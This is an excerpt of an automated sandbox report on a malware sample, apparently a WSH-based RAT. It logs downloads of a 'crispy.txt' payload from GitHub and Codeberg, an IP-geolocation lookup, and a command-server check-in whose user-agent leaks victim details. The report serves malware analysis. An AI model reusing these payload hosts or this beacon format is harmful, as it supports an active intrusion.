Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.16:49736
Source: Joe Sandbox ViewIP Address: 13.107.219.40 13.107.219.40
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: global trafficHTTP traffic detected: GET /mikecollines27288292/crispy-palm-tree/main/crispy.txt HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /mikecollines27288292/crispy-palm-tree/raw/branch/main/crispy.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: */*user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ipinfo.ioConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /rules/rule324002v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324001v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324003v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324006v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324005v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324007v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324008v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule63067v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324010v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule324009v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /mikecollines27288292/crispy-palm-tree/main/crispy.txt HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /mikecollines27288292/crispy-palm-tree/raw/branch/main/crispy.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: */*user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: ipinfo.ioConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Accept: */*user-agent: DECFLWSHRAT|B81A4609|377142|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 6/12/2023|DECFL - JavaScript-v3.4|US:US/WashingtonTARGET-URL: is-readyTARGET-IP: 172.86.79.202TARGET-PORT: 8000Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: webmicroengine.comContent-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
